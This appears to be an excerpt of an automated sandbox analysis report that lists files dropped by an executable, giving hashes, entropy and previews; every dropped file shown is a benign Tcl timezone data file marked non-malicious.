                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):233
                                                                                                                                                                                                                              Entropy (8bit):4.7047837427916095
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:SlSWB9vsM3y73GK7JHAIgp3GKZRN/2903GfJ4903GK8:MByMY3GK7Kp3GKnt2903GfJ4903GK8
                                                                                                                                                                                                                              MD5:DEE404D54FD707C4A27F464B5F19D135
                                                                                                                                                                                                                              SHA1:AD95D04738F6B15A93DED1DE6B5FA9F47C8E38CB
                                                                                                                                                                                                                              SHA-256:437DA148B94DBA4CEA402169878541DB9C3419ABAB6750D1C36625DD3053019E
                                                                                                                                                                                                                              SHA-512:421D6AF30F0C64EA6CB9F9DC4E7EF9E8EE5945F81A5E82A6D959D32AD69F325770DB6A07D8F52EFE7EE7F6C3AD4E1F34AA30A6B5E006C928119A54E746D6FE6B
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(America/Indiana/Indianapolis)]} {.. LoadTimeZoneFile America/Indiana/Indianapolis..}..set TZData(:America/Indianapolis) $TZData(:America/Indiana/Indianapolis)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):7638
                                                                                                                                                                                                                              Entropy (8bit):3.8629745113156004
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:/nGaLV911sF7Lv/PCewtA8CzSPyDLbrcUia:/GPlLv/PCenJzS6cy
                                                                                                                                                                                                                              MD5:DBF9C2CCF786A593C9D6E4F4BB37ACE9
                                                                                                                                                                                                                              SHA1:4D2332A530A36E6DB2802DD9FA2DAF5C0594D5EA
                                                                                                                                                                                                                              SHA-256:5A1F7F5EDAD0251B73C33E7B5DDEE194646E9D3992B169DC1A64D155765D472C
                                                                                                                                                                                                                              SHA-512:70D75371497CED3B6C731C95299CDD5F8F49C3C6EEDDF31EB05D008769D76ACFE8BFA9A2ECE45BD0BA2E279BBEF65945955791EFC04A569F5CAA13665CD2545F
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Inuvik) {.. {-9223372036854775808 0 0 -00}.. {-536457600 -28800 0 PST}.. {-147888000 -21600 1 PDDT}.. {-131558400 -28800 0 PST}.. {315558000 -25200 0 MST}.. {325674000 -21600 1 MDT}.. {341395200 -25200 0 MST}.. {357123600 -21600 1 MDT}.. {372844800 -25200 0 MST}.. {388573200 -21600 1 MDT}.. {404899200 -25200 0 MST}.. {420022800 -21600 1 MDT}.. {436348800 -25200 0 MST}.. {452077200 -21600 1 MDT}.. {467798400 -25200 0 MST}.. {483526800 -21600 1 MDT}.. {499248000 -25200 0 MST}.. {514976400 -21600 1 MDT}.. {530697600 -25200 0 MST}.. {544611600 -21600 1 MDT}.. {562147200 -25200 0 MST}.. {576061200 -21600 1 MDT}.. {594201600 -25200 0 MST}.. {607510800 -21600 1 MDT}.. {625651200 -25200 0 MST}.. {638960400 -21600 1 MDT}.. {657100800 -25200 0 MST}.. {671014800 -21600 1 MDT}.. {688550400 -25200 0 MST}.. {702464400 -21600 1 MDT}.. {7200000
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):7671
                                                                                                                                                                                                                              Entropy (8bit):3.832645570123566
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:7FE5Ct/cQ1BRP0HY2iU7KKdFL6Aa2K4gSLf8e:7FEct/N0HY2iUmUFLqU
                                                                                                                                                                                                                              MD5:8020712BBA127EA8AB52E8F5DB14286E
                                                                                                                                                                                                                              SHA1:DAEBC76FE10770D3FC2B5E1C14823B2B5543BA35
                                                                                                                                                                                                                              SHA-256:AFC4627879F4A618F5E3BA9EA123F3212E161F4CCFD0DF46F3B6B7CD2E2C0D7E
                                                                                                                                                                                                                              SHA-512:2F5C63F427A5DEDD5BF2B3867BE4C13774E9276C1472BF4170BCB2DA462B848CC8088743D032765133EE138388DF4217E4FC1475B12D2C8AF657A45ED6FEDE93
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Iqaluit) {.. {-9223372036854775808 0 0 -00}.. {-865296000 -14400 0 EWT}.. {-769395600 -14400 1 EPT}.. {-765396000 -18000 0 EST}.. {-147898800 -10800 1 EDDT}.. {-131569200 -18000 0 EST}.. {325666800 -14400 1 EDT}.. {341388000 -18000 0 EST}.. {357116400 -14400 1 EDT}.. {372837600 -18000 0 EST}.. {388566000 -14400 1 EDT}.. {404892000 -18000 0 EST}.. {420015600 -14400 1 EDT}.. {436341600 -18000 0 EST}.. {452070000 -14400 1 EDT}.. {467791200 -18000 0 EST}.. {483519600 -14400 1 EDT}.. {499240800 -18000 0 EST}.. {514969200 -14400 1 EDT}.. {530690400 -18000 0 EST}.. {544604400 -14400 1 EDT}.. {562140000 -18000 0 EST}.. {576054000 -14400 1 EDT}.. {594194400 -18000 0 EST}.. {607503600 -14400 1 EDT}.. {625644000 -18000 0 EST}.. {638953200 -14400 1 EDT}.. {657093600 -18000 0 EST}.. {671007600 -14400 1 EDT}.. {688543200 -18000 0 EST}.. {7024
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):847
                                                                                                                                                                                                                              Entropy (8bit):4.206296468996689
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:5seRvZGjFS/uk1p/uue/udYR/u+zN5hi/uW9/uoUF0/u8Bb/u33RU/uMZ8/unuR3:5jUjFo1pFGzfAYFqB43RMER3
                                                                                                                                                                                                                              MD5:95B59E3EA2A270A34BDF98AA899203C8
                                                                                                                                                                                                                              SHA1:93599597797F4BAFE5C75179FB795058B1E3527D
                                                                                                                                                                                                                              SHA-256:4B9D5177CBA057CD53D53120A49B8A47ECCB00150018581A84851E9D5437D643
                                                                                                                                                                                                                              SHA-512:032BC07F9E92B756A0732AECC2DFEC4C89A58B3D6D3CA57A0F99F2AD1D51676804C7B6CE50EB3B37BB8A1EF382168AC83989D609D37C57308E29B51F1FDEFB1E
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Jamaica) {.. {-9223372036854775808 -18430 0 LMT}.. {-2524503170 -18430 0 KMT}.. {-1827687170 -18000 0 EST}.. {126248400 -18000 0 EST}.. {126687600 -14400 1 EDT}.. {152085600 -18000 0 EST}.. {162370800 -14400 1 EDT}.. {183535200 -18000 0 EST}.. {199263600 -14400 1 EDT}.. {215589600 -18000 0 EST}.. {230713200 -14400 1 EDT}.. {247039200 -18000 0 EST}.. {262767600 -14400 1 EDT}.. {278488800 -18000 0 EST}.. {294217200 -14400 1 EDT}.. {309938400 -18000 0 EST}.. {325666800 -14400 1 EDT}.. {341388000 -18000 0 EST}.. {357116400 -14400 1 EDT}.. {372837600 -18000 0 EST}.. {388566000 -14400 1 EDT}.. {404892000 -18000 0 EST}.. {420015600 -14400 1 EDT}.. {436341600 -18000 0 EST}.. {441781200 -18000 0 EST}..}..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):211
                                                                                                                                                                                                                              Entropy (8bit):4.94277888588308
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:SlSWB9vsM3y7/MI6HAIgp/MIwRN/290pPGe90/MIz:MByMY/Myp/M9Rt290h390/M4
                                                                                                                                                                                                                              MD5:E020D4F9CB1AF91D373CD9F3C2247428
                                                                                                                                                                                                                              SHA1:0ADF2E9F8D9F8641E066764BA1BAF068F0332CE9
                                                                                                                                                                                                                              SHA-256:4A0495852CD4D0652B82FB57024645916DB8F192EEF9A82AFD580D87F4D496ED
                                                                                                                                                                                                                              SHA-512:03190F0E7EC35A358670B1617CB5C17EA3DD41195B2C4B748479D80ABAB4DB395293F688D94B87662D0469F6C5885CF7E7C9A995493A191905753F740DF659E1
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(America/Argentina/Jujuy)]} {.. LoadTimeZoneFile America/Argentina/Jujuy..}..set TZData(:America/Jujuy) $TZData(:America/Argentina/Jujuy)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):8682
                                                                                                                                                                                                                              Entropy (8bit):3.9620285142779728
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:/fCG0rHPC9+j1giaJCUbtp0nFI+g/iexpCVaBnNnt61nctE1:/aG0rq9DiaJCUbPI+D/iMpCIBSuk
                                                                                                                                                                                                                              MD5:8160A0D27EECEF40F6F34A06D5D02BE6
                                                                                                                                                                                                                              SHA1:7CAA64F83BAA0C23EE05A72BB1079AA552FA2F3D
                                                                                                                                                                                                                              SHA-256:5FBE6A1FA2D3DFE23C7378E425F32BEBCA44735DA25EA075A7E5CE24BFD4049D
                                                                                                                                                                                                                              SHA-512:59B8D04595007B45E582E6D17734999074CA67A93F5DF742EFE1EB78DB8ABD359D4C3B213B678C6A46040A13AAB709A994B6A532D720D3EF6FCA2730ABF4885E
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Juneau) {.. {-9223372036854775808 54139 0 LMT}.. {-3225223727 -32261 0 LMT}.. {-2188954939 -28800 0 PST}.. {-883584000 -28800 0 PST}.. {-880207200 -25200 1 PWT}.. {-769395600 -25200 1 PPT}.. {-765385200 -28800 0 PST}.. {-757353600 -28800 0 PST}.. {-31507200 -28800 0 PST}.. {-21477600 -25200 1 PDT}.. {-5756400 -28800 0 PST}.. {9972000 -25200 1 PDT}.. {25693200 -28800 0 PST}.. {41421600 -25200 1 PDT}.. {57747600 -28800 0 PST}.. {73476000 -25200 1 PDT}.. {89197200 -28800 0 PST}.. {104925600 -25200 1 PDT}.. {120646800 -28800 0 PST}.. {126698400 -25200 1 PDT}.. {152096400 -28800 0 PST}.. {162381600 -25200 1 PDT}.. {183546000 -28800 0 PST}.. {199274400 -25200 1 PDT}.. {215600400 -28800 0 PST}.. {230724000 -25200 1 PDT}.. {247050000 -28800 0 PST}.. {262778400 -25200 1 PDT}.. {278499600 -28800 0 PST}.. {294228000 -25200 1 PDT}.. {309949
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):9553
                                                                                                                                                                                                                              Entropy (8bit):3.853353361425414
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:tfTwKdrdJ9+StCt/cL1BRP0HY2iU7KKdFL6Aa2K4gSLf8e:tfUKNdJ9+SItON0HY2iUmUFLqU
                                                                                                                                                                                                                              MD5:D721B38F1FFF1A6F5C02B72ECC06CDE5
                                                                                                                                                                                                                              SHA1:E70D99A9FC1DA9F30389129EE00FE20FA79D66A8
                                                                                                                                                                                                                              SHA-256:9EB1F2B19C44A55D6CC9FD1465BAF6535856941C067831E4B5E0494665014BF5
                                                                                                                                                                                                                              SHA-512:3C82A8C27026228F359FD96A4306F1BC337DE655FD1BA02C4399162E44DE59AD58CE569DA5AEA36E586C3BDEE7256420AABB84B44D277E244FE5AD771B4BE307
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Kentucky/Louisville) {.. {-9223372036854775808 -20582 0 LMT}.. {-2717647200 -21600 0 CST}.. {-1633276800 -18000 1 CDT}.. {-1615136400 -21600 0 CST}.. {-1601827200 -18000 1 CDT}.. {-1583686800 -21600 0 CST}.. {-1546279200 -21600 0 CST}.. {-1535904000 -18000 1 CDT}.. {-1525280400 -21600 0 CST}.. {-905097600 -18000 1 CDT}.. {-891795600 -21600 0 CST}.. {-883591200 -21600 0 CST}.. {-880214400 -18000 1 CWT}.. {-769395600 -18000 1 CPT}.. {-765392400 -21600 0 CST}.. {-757360800 -21600 0 CST}.. {-747251940 -18000 1 CDT}.. {-744224400 -21600 0 CST}.. {-620841600 -18000 1 CDT}.. {-608144400 -21600 0 CST}.. {-589392000 -18000 1 CDT}.. {-576090000 -21600 0 CST}.. {-557942400 -18000 1 CDT}.. {-544640400 -21600 0 CST}.. {-526492800 -18000 1 CDT}.. {-513190800 -21600 0 CST}.. {-495043200 -18000 1 CDT}.. {-481741200 -21600 0 CST}.. {-463593600 -18000
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):8558
                                                                                                                                                                                                                              Entropy (8bit):3.869494272122571
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:4F8qMahLi8hR1BRP0HY2iU7KKdFL6Aa2K4gSLf8e:4F8HaUqJN0HY2iUmUFLqU
                                                                                                                                                                                                                              MD5:AED6497590DA305D16AC034979C8B1E9
                                                                                                                                                                                                                              SHA1:AD6F1788310A3A5A761873FEF1A32416B7DBCA89
                                                                                                                                                                                                                              SHA-256:1C6C7FB0AE628EB6BB305B51859C4E5594A6B0876C386ED9C1C3355E7CB37AE1
                                                                                                                                                                                                                              SHA-512:58D960AB5F2D9F8E4DD0171E5E36CE2E072F74A7AFDBC43F9340BBCF0CDC0D060AC895F9FCF551F4CC7EB6DBF2E9835C8C3D58E87CA4FBC98C720F51C462EDCD
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Kentucky/Monticello) {.. {-9223372036854775808 -20364 0 LMT}.. {-2717647200 -21600 0 CST}.. {-1633276800 -18000 1 CDT}.. {-1615136400 -21600 0 CST}.. {-1601827200 -18000 1 CDT}.. {-1583686800 -21600 0 CST}.. {-880214400 -18000 1 CWT}.. {-769395600 -18000 1 CPT}.. {-765392400 -21600 0 CST}.. {-757360800 -21600 0 CST}.. {-63136800 -21600 0 CST}.. {-52934400 -18000 1 CDT}.. {-37213200 -21600 0 CST}.. {-21484800 -18000 1 CDT}.. {-5763600 -21600 0 CST}.. {9964800 -18000 1 CDT}.. {25686000 -21600 0 CST}.. {41414400 -18000 1 CDT}.. {57740400 -21600 0 CST}.. {73468800 -18000 1 CDT}.. {89190000 -21600 0 CST}.. {104918400 -18000 1 CDT}.. {120639600 -21600 0 CST}.. {126691200 -18000 1 CDT}.. {152089200 -21600 0 CST}.. {162374400 -18000 1 CDT}.. {183538800 -21600 0 CST}.. {199267200 -18000 1 CDT}.. {215593200 -21600 0 CST}.. {230716800 -18000
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):204
                                                                                                                                                                                                                              Entropy (8bit):4.8670778268802195
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:SlSWB9vsM3y73GKaHAIgp3GKIN/2901iZ903GKT:MByMY3GKDp3GKIt290Q903GKT
                                                                                                                                                                                                                              MD5:50434016470AC512A8E2BEBA0BCEBC15
                                                                                                                                                                                                                              SHA1:F3541F6EE201FA33C66042F5C11A26434D37D42C
                                                                                                                                                                                                                              SHA-256:D66E77E6FF789D4D6CA13CDB204B977E1FE64BE9AFEE7B41F2C17ED8217FD025
                                                                                                                                                                                                                              SHA-512:EB1FF97050B7E067DCB68FF7C8F912C8A0C02144BB8E2EAA58C1136C6CC4A2B98C897DD23BB1E9C82D9AF6D028EE45227F97676CB34B6B830CDF5D707B990E57
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(America/Indiana/Knox)]} {.. LoadTimeZoneFile America/Indiana/Knox..}..set TZData(:America/Knox_IN) $TZData(:America/Indiana/Knox)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):204
                                                                                                                                                                                                                              Entropy (8bit):4.9362668992592456
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:SlSWB9vsM3y7p5oeSHAIgppON/2901Qv090ppv:MByMYbpwt290ev090b
                                                                                                                                                                                                                              MD5:FE9CEC6C50DF451B599B98AE8A434FF7
                                                                                                                                                                                                                              SHA1:60F997825766662B2C5415FBE4D65CEA6D326537
                                                                                                                                                                                                                              SHA-256:5AF9B28C48661FDC81762D249B716BA077F0A40ECF431D34A893BB7EABA57965
                                                                                                                                                                                                                              SHA-512:1311605021871BAFAF321AA48B352262C6BA42149101CCD4FDD4000435B2584AC564E0F76D481BB181767C010FD922BAA4E4EBB401AC2FF27B21874D89332872
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(America/Puerto_Rico)]} {.. LoadTimeZoneFile America/Puerto_Rico..}..set TZData(:America/Kralendijk) $TZData(:America/Puerto_Rico)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):218
                                                                                                                                                                                                                              Entropy (8bit):4.902526230255025
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:SlSWB9eg/290WDm2OHphvoHvKZdcyFXmBVVON:MB86290ymdHphvCvKfcyy/ON
                                                                                                                                                                                                                              MD5:3BC04900A19D0152A31B353C6715A97B
                                                                                                                                                                                                                              SHA1:58A6D49E0B6FA00CBEAFD695D604D740AD63C54E
                                                                                                                                                                                                                              SHA-256:5488D98AA3C29D710C6AF92C42ACE36550A5BFF78C155CDF8769EE31F71CF033
                                                                                                                                                                                                                              SHA-512:65302935090F98A81443A1E1158911F57C3A1564564CD401CA72DDBF66D967DB564EF5AE8A4083D83984B9EF55AB53159010EFE2DB5D7A723F7EA61A1795322D
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/La_Paz) {.. {-9223372036854775808 -16356 0 LMT}.. {-2524505244 -16356 0 CMT}.. {-1205954844 -12756 1 BST}.. {-1192307244 -14400 0 -04}..}..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):460
                                                                                                                                                                                                                              Entropy (8bit):4.2444415392593875
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:12:MB86290B2mdH4VCvvCOt/Os/OCQXR/uFfC3/O3e/uFbs/OX/OqF/O+8/OOS1F5/D:59etvqOVLOR/uGD/utsg38xSP5r
                                                                                                                                                                                                                              MD5:5F41E848D2DDE91261F45CB577B1B0A9
                                                                                                                                                                                                                              SHA1:DF284499CF57479ADE5E1D3DC01D6DCCF6AFDFE1
                                                                                                                                                                                                                              SHA-256:6E01002F264DF9A6FC247F95399F4F42DCCC7AB890B0C259DE93DCC97DEC89CE
                                                                                                                                                                                                                              SHA-512:2F5472F812734E892182632B8A34A4AD7B342541D0C3F1107BD95FFBE25D9351A0CDF5F58F35A1F37365DDF8A8A5D883C89C3CC40A9AD09D54CA152DC6BE1A09
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Lima) {.. {-9223372036854775808 -18492 0 LMT}.. {-2524503108 -18516 0 LMT}.. {-1938538284 -14400 0 -05}.. {-1002052800 -18000 0 -05}.. {-986756400 -14400 1 -05}.. {-971035200 -18000 0 -05}.. {-955306800 -14400 1 -05}.. {-939585600 -18000 0 -05}.. {512712000 -18000 0 -05}.. {544248000 -18000 0 -05}.. {638942400 -18000 0 -05}.. {765172800 -18000 0 -05}..}..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):9726
                                                                                                                                                                                                                              Entropy (8bit):3.8515163794355916
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:192:/uX68CWSgG0U9bFzN6IkWq/WHQt/RY4yP:/uX68CWSgGVbGBt/M
                                                                                                                                                                                                                              MD5:4D4F198238E4E76753411896239041C3
                                                                                                                                                                                                                              SHA1:AD41D199DF0B794B5AB7F165C8A141787FAAC9A9
                                                                                                                                                                                                                              SHA-256:DA3F7572F04E6AE78B8F044761E6F48D37EE259A9C1FE15A67072CC64A299FDB
                                                                                                                                                                                                                              SHA-512:BA39D174B73B1D4B09E8AC07291BED0B9658A4330AE50881080F0E37C35BD8A6F55C49F1D649ED1F19CE47002435D8724048759DFC813BF9C2E9B06B581486FF
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Los_Angeles) {.. {-9223372036854775808 -28378 0 LMT}.. {-2717640000 -28800 0 PST}.. {-1633269600 -25200 1 PDT}.. {-1615129200 -28800 0 PST}.. {-1601820000 -25200 1 PDT}.. {-1583679600 -28800 0 PST}.. {-880207200 -25200 1 PWT}.. {-769395600 -25200 1 PPT}.. {-765385200 -28800 0 PST}.. {-757353600 -28800 0 PST}.. {-687967140 -25200 1 PDT}.. {-662655600 -28800 0 PST}.. {-620838000 -25200 1 PDT}.. {-608137200 -28800 0 PST}.. {-589388400 -25200 1 PDT}.. {-576082800 -28800 0 PST}.. {-557938800 -25200 1 PDT}.. {-544633200 -28800 0 PST}.. {-526489200 -25200 1 PDT}.. {-513183600 -28800 0 PST}.. {-495039600 -25200 1 PDT}.. {-481734000 -28800 0 PST}.. {-463590000 -25200 1 PDT}.. {-450284400 -28800 0 PST}.. {-431535600 -25200 1 PDT}.. {-418230000 -28800 0 PST}.. {-400086000 -25200 1 PDT}.. {-386780400 -28800 0 PST}.. {-368636400 -25200 1 PDT}..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):228
                                                                                                                                                                                                                              Entropy (8bit):4.911677030377383
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:SlSWB9vsM3y71PiKp4o2HAIgp1PiKp4BvN/290hp4901PiKp44v:MByMYPyApPydt290P490Pyi
                                                                                                                                                                                                                              MD5:ACE87B25FE5604C83127A9F148A34C8C
                                                                                                                                                                                                                              SHA1:25C8D85B4740C53F40421D0DADCA95225EAB7829
                                                                                                                                                                                                                              SHA-256:F85C1253F4C1D3E85757D3DEA4FD3C61F1AA7BE6BAAE8CB8579278412905ACB2
                                                                                                                                                                                                                              SHA-512:AC0662B19F336474B146E06778E1FB43B941ABC8FD51BDB31B2640C94CCDFBE7659960EF4FD18329AFA7AD11316FC08D3CF33BB27931EA70AA7218667A8D0737
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(America/Kentucky/Louisville)]} {.. LoadTimeZoneFile America/Kentucky/Louisville..}..set TZData(:America/Louisville) $TZData(:America/Kentucky/Louisville)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):207
                                                                                                                                                                                                                              Entropy (8bit):4.900350318979456
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:SlSWB9vsM3y7p5oeSHAIgppON/290h48h490ppv:MByMYbpwt290/490b
                                                                                                                                                                                                                              MD5:83CE86174ADB5F276AABD26FE132BB55
                                                                                                                                                                                                                              SHA1:925E3F4A5DB1A2C33B3A537C8DBC9CFE309FA340
                                                                                                                                                                                                                              SHA-256:1E786229B84CE86DB6316B24C85F7CF4CFE66011F973053AD0E108BFCC9A9DE2
                                                                                                                                                                                                                              SHA-512:BA2AC5571D772B577735BC8E43FF8023228BC61A974DCCE0EAE20EC9B11FC757E56CABDAE00933A99834108114E598B7EC149BB017EB80BE18301A655F341A36
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(America/Puerto_Rico)]} {.. LoadTimeZoneFile America/Puerto_Rico..}..set TZData(:America/Lower_Princes) $TZData(:America/Puerto_Rico)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1539
                                                                                                                                                                                                                              Entropy (8bit):3.7453889877550512
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:48:5QChlvEw6kSSx5H4a8tf3fkuoLdNYVZDNR8nd:OIlvEwJSSxdF8tfMuoLdNYVZJR8nd
                                                                                                                                                                                                                              MD5:EB0EDF4E075E3CF9F8EDF2B689C2FE54
                                                                                                                                                                                                                              SHA1:9713D7E8AA0E7164824657D00DE6C49483D2BD19
                                                                                                                                                                                                                              SHA-256:F65C5957D434A87324AAD35991E7666E426A20C40432540D9A3CB1EEE9141761
                                                                                                                                                                                                                              SHA-512:0A0D1E4E0BD7D854E8F139E6F7A9BBC66422B73F7A6C2E1F1B6D2CA400B24B3D220AB519B6AEAA743443E9A4B748709CDF2C276BF52C5382669B12734A469125
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Maceio) {.. {-9223372036854775808 -8572 0 LMT}.. {-1767217028 -10800 0 -03}.. {-1206957600 -7200 1 -03}.. {-1191362400 -10800 0 -03}.. {-1175374800 -7200 1 -03}.. {-1159826400 -10800 0 -03}.. {-633819600 -7200 1 -03}.. {-622069200 -10800 0 -03}.. {-602283600 -7200 1 -03}.. {-591832800 -10800 0 -03}.. {-570747600 -7200 1 -03}.. {-560210400 -10800 0 -03}.. {-539125200 -7200 1 -03}.. {-531352800 -10800 0 -03}.. {-191365200 -7200 1 -03}.. {-184197600 -10800 0 -03}.. {-155163600 -7200 1 -03}.. {-150069600 -10800 0 -03}.. {-128898000 -7200 1 -03}.. {-121125600 -10800 0 -03}.. {-99954000 -7200 1 -03}.. {-89589600 -10800 0 -03}.. {-68418000 -7200 1 -03}.. {-57967200 -10800 0 -03}.. {499748400 -7200 1 -03}.. {511236000 -10800 0 -03}.. {530593200 -7200 1 -03}.. {540266400 -10800 0 -03}.. {562129200 -7200 1 -03}.. {571197600 -10800 0 -03}..
